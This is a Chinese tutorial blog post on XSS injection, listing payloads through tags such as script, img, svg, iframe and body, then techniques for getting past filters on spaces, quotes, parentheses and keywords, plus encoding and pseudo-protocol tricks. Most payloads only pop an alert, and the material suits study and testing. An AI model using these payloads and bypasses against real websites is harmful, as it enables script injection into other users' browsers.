当前位置: 首页 > article >正文

【Web安全】xss攻击方式与绕过

xss攻击方式与绕过

文章目录

  • xss攻击方式与绕过
    • XSS攻击方式
      • 1. script标签
      • 2. img标签
      • 3. input标签
      • 4. details标签
      • 5. svg标签
      • 6. select标签
      • 7. iframe标签
      • 8. video标签
      • 9. audio标签
      • 10. body标签
      • 11. textarea标签
    • 常见绕过方式
      • 1. 空格过滤
      • 2. 引号过滤
      • 3. 括号过滤
      • 4. 关键词过滤
      • 5. 编码绕过
      • 6. url地址过滤
      • 7. 伪协议

本节参考了 XSS(跨站攻击),并且给予一些优化,相比于参考文章来说,这篇文章比较简单,在httponly和waf绕过方面不会涉及。下面就是对于参考文章的总结,也建议去阅读参考文章。

XSS攻击方式

1. script标签

<script>alert("xss");</script>

注释:这是最基本的XSS攻击形式。通过插入<script>标签,攻击者可以在受害者的浏览器上执行任意JavaScript代码。在这个例子中,它会显示一个警告框,显示消息"xss"。

2. img标签

<img src=1 onerror=alert("xss")>

注释:利用<img>标签的onerror事件。如果图片加载失败(例如,src设置为不存在的资源),则执行onerror中的JavaScript代码。

3. input标签

<input onblur=alert("xss") autofocus><input autofocus>
<input onfocus=alert("xss")>
<input onclick=alert("xss")>
<input onmouseover=alert("xss")>

注释:通过在<input>标签的事件处理器中嵌入代码。例如,onblur事件在元素失去焦点时触发,onfocus在元素获得焦点时触发,onclick在点击时触发,onmouseover在鼠标悬停时触发。

4. details标签

<details ontoggle=alert("xss");>

注释:利用HTML5的<details>标签,当用户切换显示/隐藏详情时,触发ontoggle事件。

5. svg标签

<svg onload=alert("xss")>

注释:使用SVG图像格式的<svg>标签。onload事件在SVG加载完成时触发,可以用于执行恶意代码。

6. select标签

<select onfocus=alert("xss")></select>
<select onfocus=alert("xss") autofocus>

注释:在<select>标签中使用onfocus事件。当下拉列表获得焦点时,触发JavaScript代码。

7. iframe标签

<iframe onload=alert("xss")></iframe>

注释:利用<iframe>标签的onload事件。当iframe加载完成后,执行指定的JavaScript代码。

8. video标签

<video><source onerror=alert("xss")>

注释:通过<video>标签中的<source>元素的onerror事件。如果视频源文件加载失败,将执行错误处理代码。

9. audio标签

<audio src=1 onerror=alert("xss")>

注释:与<img>标签类似,这里使用<audio>标签的onerror事件来执行代码。如果音频文件加载失败,将触发onerror事件。

10. body标签

<body onload=alert("xss")>

注释:在HTML的<body>标签的onload事件中嵌入代码。当页面加载完成时,会执行此代码。

11. textarea标签

<textarea onfocus=alert("xss"); autofocus>

注释:使用<textarea>元素的onfocus事件。当文本区域获得焦点时,将执行指定的JavaScript代码。

常见绕过方式

1. 空格过滤

当空格被过滤了,可以用**/和注释符**代替空格,

<img/src="x"/onerror=alert(1);>
<img/**/src="x"/**/onerror=alert(1);>

2. 引号过滤

在html中可以不使用引号,在js中,可以用反引号代替单双引号

<img src=x onerror=alert(`xss`);>

3. 括号过滤

当括号被过滤的时候可以使用throw来绕过。throw 语句用于当错误发生时抛出一个错误。(末尾有解释)

<img src=x onerror="javascript:window.onerror=alert;throw 1">
<a onmouseover="javascript:window.onerror=alert;throw 1>

4. 关键词过滤

关键词过滤可能可以使用大小写绕过、双写绕过、字符串拼接绕过

<sCRiPt>alert(1);</sCrIpT>
<scrscriptipt>alert(1);</scrscriptipt>
<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">  反引号代替单双引号

5. 编码绕过

使用Unicode、url、Ascii、hex、base64绕过

// Unicode
javasc&#x72;&#x69;pt:alert(/xss/)     (编码了r和i)
// url
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
// Ascii
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
// hex
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
// base64
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

6. url地址过滤

// 使用URL编码
// 十进制、八进制、十六进制IP
// 用//代替http://
// 使用中文句号代替英文点号

7. 伪协议

"><a href=javascript:alert(/xss/)>   o_n和<scr_ipt>过滤

http://www.kler.cn/a/146091.html

相关文章:

  • Ubuntu 24.04 LTS 安装 Docker Desktop
  • Rust实现内网穿透工具:从原理到实现
  • 基于32QAM的载波同步和定时同步性能仿真,包括Costas环的gardner环
  • 【SPIE出版|EI、Scopus双检索】2025年绿色能源与环境系统国际学术会议(GEES 2025)
  • Linux提权-02 sudo提权
  • Nginx三种不同类型的虚拟主机(基于域名、IP 和端口)
  • Java基础之集合类
  • 全面探讨HTTP协议从0.9到3.0版本的发展和特点
  • ChatGPT进阶:提示工程的神秘面纱与实战指南
  • VSCode 警告:v-on event ‘@toggleClick‘ must be hyphenated
  • Linux:docker容器操作(4)
  • OpenCV项目开发实战--基本图像分割图生成器
  • 基于JavaWeb+SpringBoot+Vue医院管理系统小程序的设计和实现
  • Elasticsearch集群部署
  • SpringCloud 微服务全栈体系(十七)
  • SQL Server Profiler基础使用
  • linux系统初始化本地git,创建ssh-key
  • group by
  • MYSQL基础知识之【索引】
  • 用xlwings新建一个excel并同时生成多个sheet
  • 数据结构(超详细讲解!!)第二十五节 线索二叉树
  • 【Skynet 入门实战练习】实现网关服务 | 用户代理 | RPC 协议 | 客户端
  • 数据链路层-以太网协议
  • 罗技M590鼠标usb优联连接不上
  • 单片机学习2——流水灯的实现
  • css给盒子写四个角